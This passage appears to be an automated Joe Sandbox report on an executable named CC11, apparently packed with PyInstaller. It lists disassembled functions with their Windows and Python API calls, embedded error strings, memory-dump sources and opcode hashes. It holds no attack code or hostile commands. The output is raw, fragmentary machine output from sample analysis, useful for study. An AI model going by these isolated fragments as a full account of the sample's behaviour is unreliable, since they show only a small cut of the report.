                                                                                                                                                                  • Opcode Fuzzy Hash: 7ac85017326a6a3638da0ed184420ce377bd8bc92a60fdcc85f64a8ab54a6b3d
                                                                                                                                                                  • Instruction Fuzzy Hash: 5F119D64B09B4281EA40DB9AE8101B867A0FF88FE4B544232EF1E53BA5DF3CE485C340
                                                                                                                                                                  APIs
                                                                                                                                                                  • PyDict_GetItemWithError.PYTHON38(?,?,00000000,00007FF8BFB78C52,?,?,?,?,?,?,?,00000000,?,00007FF8BFB7381F), ref: 00007FF8BFB7BC2D
                                                                                                                                                                  • PyErr_Occurred.PYTHON38(?,?,00000000,00007FF8BFB78C52,?,?,?,?,?,?,?,00000000,?,00007FF8BFB7381F), ref: 00007FF8BFB7BC3C
                                                                                                                                                                  • PyErr_Format.PYTHON38(?,?,00000000,00007FF8BFB78C52,?,?,?,?,?,?,?,00000000,?,00007FF8BFB7381F), ref: 00007FF8BFB7BC6D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Err_$Dict_ErrorFormatItemOccurredWith
                                                                                                                                                                  • String ID: not enough arguments$required argument '%S' missing
                                                                                                                                                                  • API String ID: 62204369-3448764933
                                                                                                                                                                  • Opcode ID: 67bdfaa597aee7b6c3e3d71308b9fb0a6ba40f0cfb4da4c07b98cbdf7840eb8d
                                                                                                                                                                  • Instruction ID: eaa1534b1e07c8d0d765c89284a9fea91da5c840330d349c807cd9ec8f76cbfa
                                                                                                                                                                  • Opcode Fuzzy Hash: 67bdfaa597aee7b6c3e3d71308b9fb0a6ba40f0cfb4da4c07b98cbdf7840eb8d
                                                                                                                                                                  • Instruction Fuzzy Hash: 04112E61A0AA8291EE558FADE54413967A0EF84BC4F18C531CB4E47B59DF2CE441CB00
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                  • String ID: CONOUT$
                                                                                                                                                                  • API String ID: 3230265001-3130406586
                                                                                                                                                                  • Opcode ID: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                                                                                                                                  • Instruction ID: 6f4386c37402aa6db2f2534a31a9692c62b08002f2a30eec1ce04c0af795c285
                                                                                                                                                                  • Opcode Fuzzy Hash: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                                                                                                                                  • Instruction Fuzzy Hash: C811D321B18A4196E3718B22E85472976A1FB9CBE4F400274EA1DC3798DF3CD400C744
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,00007FF6900139F2), ref: 00007FF69001821D
                                                                                                                                                                  • K32EnumProcessModules.KERNEL32(?,00000000,?,00007FF6900139F2), ref: 00007FF69001827A
                                                                                                                                                                    • Part of subcall function 00007FF6900186B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF690013FA4,00000000,00007FF690011925), ref: 00007FF6900186E9
                                                                                                                                                                  • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF6900139F2), ref: 00007FF690018305
                                                                                                                                                                  • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF6900139F2), ref: 00007FF690018364
                                                                                                                                                                  • FreeLibrary.KERNEL32(?,00000000,?,00007FF6900139F2), ref: 00007FF690018375
                                                                                                                                                                  • FreeLibrary.KERNEL32(?,00000000,?,00007FF6900139F2), ref: 00007FF69001838A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3462794448-0
                                                                                                                                                                  • Opcode ID: c116373e2a09e68fc95a37a35a910f387ed59b49a7d0ab4690c2b7d3ff367989
                                                                                                                                                                  • Instruction ID: 68c38ac7e61ed035dd068d7db7e4c83419e214784005ea1dbc459c319fa64fd5
                                                                                                                                                                  • Opcode Fuzzy Hash: c116373e2a09e68fc95a37a35a910f387ed59b49a7d0ab4690c2b7d3ff367989
                                                                                                                                                                  • Instruction Fuzzy Hash: B4418162A1968291EAB09B32A5412BA7394FF85FC8F484175DFAD9778DDF3CE601C700
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF690017B50: GetCurrentProcess.KERNEL32 ref: 00007FF690017B70
                                                                                                                                                                    • Part of subcall function 00007FF690017B50: OpenProcessToken.ADVAPI32 ref: 00007FF690017B83
                                                                                                                                                                    • Part of subcall function 00007FF690017B50: GetTokenInformation.ADVAPI32 ref: 00007FF690017BA8
                                                                                                                                                                    • Part of subcall function 00007FF690017B50: GetLastError.KERNEL32 ref: 00007FF690017BB2
                                                                                                                                                                    • Part of subcall function 00007FF690017B50: GetTokenInformation.ADVAPI32 ref: 00007FF690017BF2
                                                                                                                                                                    • Part of subcall function 00007FF690017B50: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF690017C0E
                                                                                                                                                                    • Part of subcall function 00007FF690017B50: CloseHandle.KERNEL32 ref: 00007FF690017C26
                                                                                                                                                                  • LocalFree.KERNEL32(?,00007FF690013814), ref: 00007FF69001848C
                                                                                                                                                                  • LocalFree.KERNEL32(?,00007FF690013814), ref: 00007FF690018495
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                  • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                  • API String ID: 6828938-1529539262
                                                                                                                                                                  • Opcode ID: 795f95526d0a951be163d7ee57e77295e71c5006ab84a191c0455a0dace466c7
                                                                                                                                                                  • Instruction ID: 9a7e1bc105953e1ca9a115c05ddec901fe9a170597832da6fcbccac4a3004707
                                                                                                                                                                  • Opcode Fuzzy Hash: 795f95526d0a951be163d7ee57e77295e71c5006ab84a191c0455a0dace466c7
                                                                                                                                                                  • Instruction Fuzzy Hash: D3216231A08742A2F660AB30E4557E973A1FF88784F8444B6EA4DC379ADF3CE545C740
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF6900243FD,?,?,?,?,00007FF69002979A,?,?,?,?,00007FF69002649F), ref: 00007FF69002A5E7
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6900243FD,?,?,?,?,00007FF69002979A,?,?,?,?,00007FF69002649F), ref: 00007FF69002A61D
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6900243FD,?,?,?,?,00007FF69002979A,?,?,?,?,00007FF69002649F), ref: 00007FF69002A64A
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6900243FD,?,?,?,?,00007FF69002979A,?,?,?,?,00007FF69002649F), ref: 00007FF69002A65B
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6900243FD,?,?,?,?,00007FF69002979A,?,?,?,?,00007FF69002649F), ref: 00007FF69002A66C
                                                                                                                                                                  • SetLastError.KERNEL32(?,?,?,00007FF6900243FD,?,?,?,?,00007FF69002979A,?,?,?,?,00007FF69002649F), ref: 00007FF69002A687
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Value$ErrorLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2506987500-0
                                                                                                                                                                  • Opcode ID: 5dcac91248c0014d458aec840eea87d8b317a92cf5de5997ea3edf93bd94a031
                                                                                                                                                                  • Instruction ID: 1712ff77c2c2f812952db0169e82a01ca582ab220fab28333c2db2069312884c
                                                                                                                                                                  • Opcode Fuzzy Hash: 5dcac91248c0014d458aec840eea87d8b317a92cf5de5997ea3edf93bd94a031
                                                                                                                                                                  • Instruction Fuzzy Hash: F8114D20F4C282A2FA74A7395A4917D6682EF497B4F5847B4E93E877DEDE2CF4024701
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                  • String ID: Unhandled exception in script
                                                                                                                                                                  • API String ID: 3081866767-2699770090
                                                                                                                                                                  • Opcode ID: aa8fae7967b6237ed58108c0441fa719abaab4bc203e45b59d8227776e6be316
                                                                                                                                                                  • Instruction ID: 9718d0a7aaf3402a58deb879cf80911b94a83efd374cba32a11739075128efa2
                                                                                                                                                                  • Opcode Fuzzy Hash: aa8fae7967b6237ed58108c0441fa719abaab4bc203e45b59d8227776e6be316
                                                                                                                                                                  • Instruction Fuzzy Hash: 15314A26A08A8299EB20EB75E8556F963A1FF88788F440175EA4D87B99DF3CD101C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Dealloc$Arg_FromLongLong_ParseTuple
                                                                                                                                                                  • String ID: OO:CopyComPointer
                                                                                                                                                                  • API String ID: 1908940310-822416302
                                                                                                                                                                  • Opcode ID: 7e00673205eba28370de99c8282450b0b613e4871889fe95876d84c7ac623f1a
                                                                                                                                                                  • Instruction ID: a1269bbc42668fb685e6eac6bf97d8f3b4b6469a22827e2337885d69e2b643b9
                                                                                                                                                                  • Opcode Fuzzy Hash: 7e00673205eba28370de99c8282450b0b613e4871889fe95876d84c7ac623f1a
                                                                                                                                                                  • Instruction Fuzzy Hash: 64214C36B09B4285EB169FB9D8501BC2760BF88BE8F494635DB5E47A94CF3CE055C301
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Message$ByteCharMultiWide
                                                                                                                                                                  • String ID: %s%s: %s$Error$Error/warning (ANSI fallback)
                                                                                                                                                                  • API String ID: 1878133881-640379615
                                                                                                                                                                  • Opcode ID: 185a5ded7e4d76afdc6dde510c40398ff569d270283616bd23a067f5071c39f1
                                                                                                                                                                  • Instruction ID: aafc1661d88d4142d1711722eb9821fdca361f80a0f20994158c0d283fc6799f
                                                                                                                                                                  • Opcode Fuzzy Hash: 185a5ded7e4d76afdc6dde510c40398ff569d270283616bd23a067f5071c39f1
                                                                                                                                                                  • Instruction Fuzzy Hash: 8C216072628A86A1E670DB20F4517EA6364FF88788F401176EB8C93B9DDF7CD645CB40
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AttrDict_Err_NextObject_String
                                                                                                                                                                  • String ID: args not a tuple?$too many initializers
                                                                                                                                                                  • API String ID: 3352738686-2791065560
                                                                                                                                                                  • Opcode ID: 2ff835a78943e0d53156706c5d13c88222d5f76d37cafafde7b459920f154dc0
                                                                                                                                                                  • Instruction ID: e0551fea632b77aaed34afb0f0097511af30594c78d0c3332f9d7dc3027b5a28
                                                                                                                                                                  • Opcode Fuzzy Hash: 2ff835a78943e0d53156706c5d13c88222d5f76d37cafafde7b459920f154dc0
                                                                                                                                                                  • Instruction Fuzzy Hash: 5A213065A08B4281EB508B9DE94477A6B61FB84BF4F144336EB6D43AE9CF7CE449C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Err_Long$Long_MaskOccurredStringSubtypeType_Unsigned
                                                                                                                                                                  • String ID: int expected instead of float
                                                                                                                                                                  • API String ID: 3681780221-2411840549
                                                                                                                                                                  • Opcode ID: 5d8bac60d503e20a68a38e0428ffacd6868880521a5a232ada2c39c0a41308f1
                                                                                                                                                                  • Instruction ID: 681ce9f7e3832852fa1cc8c13991b109dc58363002de12897640769ad404d3e3
                                                                                                                                                                  • Opcode Fuzzy Hash: 5d8bac60d503e20a68a38e0428ffacd6868880521a5a232ada2c39c0a41308f1
                                                                                                                                                                  • Instruction Fuzzy Hash: 5B011D21B09A4281EB149FADF9440752765BF88BF5B289331DB6E866E1EF2CE494C300
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Err_$LongLong_MaskOccurredStringSubtypeType_Unsigned
                                                                                                                                                                  • String ID: int expected instead of float
                                                                                                                                                                  • API String ID: 2539109060-2411840549
                                                                                                                                                                  • Opcode ID: d580dedb6eb4beabc372b8108e2d76eacac62e2364c24e9b9c54f12f7d4f31b0
                                                                                                                                                                  • Instruction ID: a8a6a27c8fdcd43582f2d038caad9ba92ef7118cdb42d1fa2fa932def82bb590
                                                                                                                                                                  • Opcode Fuzzy Hash: d580dedb6eb4beabc372b8108e2d76eacac62e2364c24e9b9c54f12f7d4f31b0
                                                                                                                                                                  • Instruction Fuzzy Hash: 97013121B0DA4285EB149FADE8540793761BF89BE4B189630DB2E826E5EF2CE444C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Err_$LongLong_MaskOccurredStringSubtypeType_Unsigned
                                                                                                                                                                  • String ID: int expected instead of float
                                                                                                                                                                  • API String ID: 2539109060-2411840549
                                                                                                                                                                  • Opcode ID: 4190966989bc7992be6b66f9c704924149e5ca780019c0be67c82ade6ce9eda0
                                                                                                                                                                  • Instruction ID: ba3c6234d49dab934ec718e4926227ba5a9aaca98832ce5f8e257ef40ea60c6a
                                                                                                                                                                  • Opcode Fuzzy Hash: 4190966989bc7992be6b66f9c704924149e5ca780019c0be67c82ade6ce9eda0
                                                                                                                                                                  • Instruction Fuzzy Hash: 48011D21A0DA4381EB149FEDEC441786760BF89BE4B149631DB6E826E1EF2DE444C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Err_Format$memcpy
                                                                                                                                                                  • String ID: bytes too long (%zd, maximum length %zd)$expected bytes, %s found
                                                                                                                                                                  • API String ID: 437140070-1985973764
                                                                                                                                                                  • Opcode ID: 10fea624f8b6b17753902bd7af56b3cf3030963c9f4ce13bdd61654d3b99bad9
                                                                                                                                                                  • Instruction ID: 89fed5b5002548ce6b5839d8881ffb04c222ff580a808b084171916f488f6aad
                                                                                                                                                                  • Opcode Fuzzy Hash: 10fea624f8b6b17753902bd7af56b3cf3030963c9f4ce13bdd61654d3b99bad9
                                                                                                                                                                  • Instruction Fuzzy Hash: 18014461E0AA87C5EB109BDDD8901B82771BF96BE4F605232CB2D472E1CE2CE099C344
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                  • Opcode ID: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                                                                                                                                  • Instruction ID: 751bbea9ba38823744a614e30e1e809dc607d79709df8e5bfa44484fecd930ba
                                                                                                                                                                  • Opcode Fuzzy Hash: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                                                                                                                                  • Instruction Fuzzy Hash: 88F0C225B09702A1EA308B34E4457392320EF59765F940675DA6E863F8DF2CD149C300
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _set_statfp
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1156100317-0
                                                                                                                                                                  • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                  • Instruction ID: e724984797730fa90e32db63e4073420c7ed40392377d907ada1700d91663afc
